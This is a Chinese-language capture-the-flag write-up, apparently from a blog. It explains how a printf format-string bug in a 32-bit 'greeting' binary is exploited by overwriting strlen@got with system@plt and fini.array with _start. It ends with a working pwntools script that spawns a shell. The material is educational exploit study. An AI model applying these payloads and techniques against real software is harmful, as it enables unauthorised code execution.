标签:you 情况下 jpg blank ice 手写 初始化 题目 利用
本题主要为printf
格式化字符串漏洞,最好的方式是手写fmt payload
,然后有一个新的知识点:
fmtstr_payload
不是特别好用,特别是只想写低字节的时候,还是得手动写fmt_payload
,抽个时间自己写个格式化payload
生成函数吧。也不是第一次在这儿折腾了。init.array
中的函数指针;在main
函数执行完退出的时候,依次调用.fini.array
中的函数指针。这两个段基本都是可读可写的。printf
将fini.array
数组中的第一个元素覆盖为main
函数的地址,或者_start
函数的地址,可以循环运行main
函数。本题只能多循环利用1次,之后就会报错。因为fini.array
段的只有一个指针大小。main:
main
函数中,首先接收stdin
的输入,最多输入64
个字符,然后将输入的内容进行拼接,拼接后直接printf
打印。
getnline:
就是普通的读取输入的函数。注意,这里调用了fgets
,strchr
,strlen
函数。
很明显,格式化字符串漏洞。不过在查看文件,发现调用过system
函数。同时got
可读可写,所以考虑将某个函数的got
表写为system@plt
。然后想办法调用/bin/sh
。
这里有个问题,就是printf
打印完后,直接结束程序运行。那么,基本是没有办法通过一次格式化漏洞就获取shell
的,要想覆盖eip
就得泄露栈地址,不可能一边泄露栈地址一边往栈地址上写。因此,需要研究一下,怎样能够让程序能再一次回到main
函数。
main
函数并不是程序运行的起点,我们至少直到,是__libc_start_main
函数,调用的main
函数。网上有一些资料,解析x86
程序运行的初始化函数执行流,详情请见这个地址。这里,只拿出一张图分析:
可以看到,_start
函数中,调用了__libc_start_main
,然后调用main
函数。初始化的时候,调用init.array
数组中的函数指针,退出的时候,调用fini.array
数组的函数指针。因此,我们只需要把fini.array
的第一个元素覆盖为main
或者_start
函数的地址即可。
在IDA
中按下ctrl + S
,可以看到程序段:
地址为0x8049934
。
步骤:
printf
,将strlen@got
写为system@plt
,同时,将0x8049934
,也就是fini.array
处写为_start
地址,获得了第二次输入的机会/bin/sh
,会调用strlen(s)
,实际调用system("/bin/sh")
。一开始用fmtstr_payload
生成payload
,长度为70
,超过了64
。因此,手动写一下。
首先观察一下,正常情况下,0x8049934
处的值是多少:
我们要改写为0x80484f0
,不难发现,只需要改写低两个字节即可。高两个字节保持为0x0804
不动。
准备手动写payload
。这里先测一下偏移,输入:aaaa%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x
输出为:
好像aaaa
被分开输出了,说明前面有2位的偏移,于是,修改输入为:bbaaaa%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x
再来一次:
计算一下偏移,offset = 12
。注意,前面有两个a
,还有一句Nice to meet you,
,也就是说,前面已经输出了0x14
个字符。
直接使用%n
写四个字节容易写失败,这里使用$hn
两个字节依次写入。本次要往str@got(0x8049a54)
写入为system@plt(0x8048490)
,然后将fini.array(0x8049934)
的低两个字节写为0x84f0
根据要格式化字符串要写的内容,对写的字节大小排个序:
本次写入,要达到的目的为:
往
0x8049a56
------>0x0804
往
0x8049a54
------>0x8490
往
0x8049934
------>0x84f0
最后结合偏移量,最终的payload
为:
payload = b‘aa‘
payload += b‘%2032c%21$hn‘ + b‘%31884c%22$hn‘ + b‘%96c%23$hna‘ + p32(0x8049a56) + p32(0x8049a54) + p32(0x8049934)
然后调试一下,看看是不是都改对了:
修改前:
修改后:
此时,获得了第二次输入机会:
输入/bin/dash
即可得到shell
。
from pwn import *
io = process(‘./greeting‘)
payload = b‘aa‘
payload += b‘%2032c%21$hn‘ + b‘%31884c%22$hn‘ + b‘%96c%23$hna‘ + p32(0x8049a56) + p32(0x8049a54) + p32(0x8049934)
io.recvuntil("Please tell me your name... ")
print(payload, len(payload))
sleep(1)
io.sendline(payload)
io.recvuntil("Please tell me your name... ")
sleep(1)
io.sendline(‘/bin/sh‘)
io.sendline(‘cat flag‘)
io.interactive()
标签:you 情况下 jpg blank ice 手写 初始化 题目 利用
原文地址:https://www.cnblogs.com/LynneHuan/p/14459776.html